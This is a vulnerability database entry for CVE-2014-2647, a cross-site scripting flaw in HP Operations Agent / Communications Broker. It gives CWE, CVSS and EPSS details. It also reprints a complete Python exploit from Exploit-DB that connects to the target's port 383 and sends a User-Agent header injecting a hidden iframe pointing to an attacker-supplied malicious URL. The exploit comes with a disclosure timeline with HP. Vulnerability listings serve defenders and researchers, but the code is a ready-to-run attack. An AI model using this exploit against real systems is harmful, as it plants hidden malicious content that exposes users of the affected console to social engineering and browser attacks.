CVE-2014-2647 : Detail

CVE-2014-2647

Cross-site Scripting
A03-Injection
0.21%V3
Network
2014-10-18
23h00 +00:00
2015-05-12
16h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site scripting (XSS) vulnerability in HP Operations Agent in HP Operations Manager (formerly OpenView Communications Broker) before 11.14 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 35076

Publication date : 2014-10-26 23h00 +00:00
Author : Matt Schmidt
EDB Verified : Yes

#!/usr/bin/python # Exploit Title: HP Operations Agent / HP Communications Broker Remote XSS iFrame Injection # Date: 10/16/2014 # Exploit Author: Matt Schmidt (Syph0n) # Vendor Homepage: www.hp.com # Version: HP Operations Manager/Operations Agent / OpenView Communications Broker < 11.14 # Tested on: Windows 7, SunOS, RHEL Linux # CVE : CVE-2014-2647 # # This script was written to exploit a remote cross-site scripting vulnerability in HP Communication Broker/ HP Operations Agent. # This vulnerability is stored in nature until the connection is terminated as it adds the XSS string to the User Agent. # Vulnerable page: /Hewlett-Packard/OpenView/BBC/status # This Exploit injects a Hidden iFrame which can be used for Social Engineering attacks as a browser exploit or other malicious URL can be embedded. # # Vulnerability Discovered by: Matt Schmidt (Syph0n) # Timeline: # 07/07/2014 - Submitted Discovery to ZDI # 07/08/2014 - ZDI decided not to accept this vulnerability and directed to HP SSRT. # 07/12/2014 - Contacted HP SSRT # 07/13/2014 - HP SSRT assigned Case SSRT101643 # 07/17/2014 - Submitted Discovery and PoC exploit code to HP SSRT # 07/30/2014 - Followed up with HP # 07/31/2014 - Response from HP Indicating they need more time for Engineering to look into the submission # 08/13/2014 - Followed up with HP # 08/13/2014 - Response from HP stating that this issue will be resolved in version OA 11.14 # 08/24/2014 - Followed up with HP on CVE Identified and Disclosure Date # 08/31/2014 - Followed up with HP again as no response to previous email # 09/04/2014 - Followed up with HP again as no response to previous two emails # 09/14/2014 - Followed up with HP again as no response to previous three emails # 09/16/2014 - HP Responded stating they where "sorting out various items concerning this issue" # 10/01/2014 - Followed up with HP asking for Disclosure Date and CVE Identifier # 10/06/2014 - HP Responded indicating a disclosure was due out the week of the 6th. # 10/15/2014 - HP Issued the following Security Bulletin regarding this vulnerability - https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04472444 # 10/15/2014 - CVE-2014-2647 Issued for this vulnerability import argparse, socket, sys # Define Help Menu if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'): print '\nUsage: ./exploit.py <TargetIP> <iFrame URL> [Port]\n' print ' <TargetIP>: The Target IP Address' print ' <iFrame URL>: Malicious URL that will be injected as a hidden iframe\n' print 'Options:' print ' [--port]: The port the HP Communications Broker is running on, default is 383' sys.exit(1) # Parse Arguments parser = argparse.ArgumentParser() parser.add_argument("TargetIP") parser.add_argument("iFrameURL") parser.add_argument("--port", type=int, default=383) args = parser.parse_args() # Define User Agent to be spoofed agent = 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)' # Define Variables host = args.TargetIP port = args.port iFrameURL = args.iFrameURL def main(): # Malicious hidden iframe payload that takes input from args.iFrameURL and fake UserAgent from agent_list payload = "GET /Hewlett-Packard/OpenView/BBC/status HTTP/1.1\r\nUser-Agent: <iframe height='0' width='0' style='visibility:hidden;display:none' src='"+iFrameURL+"'></iframe><a>"+ agent +"</a>\r\n\r\n" # Create Socket and check connection to target. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[*] Checking host: " +host+"\n" try: s.connect((host, int(port))) except Exception as e: print "[+] Error Connecting: ", e exit() print "[*] Sending payload to HP OpenView HTTP Communication host " +host+"\n" # Keep connection alive while payload != 'q': s.send(payload.encode()) data = s.recv(1024) print "[*] Payload Sent." payload = raw_input("\n[+] Keeping Connection Open ([q]uit):") return if __name__ == '__main__': main()

Products Mentioned

Configuraton 0

Hp>>Operations_agent >> Version To (including) 11.13

References

http://www.exploit-db.com/exploits/35076
Tags : exploit, x_refsource_EXPLOIT-DB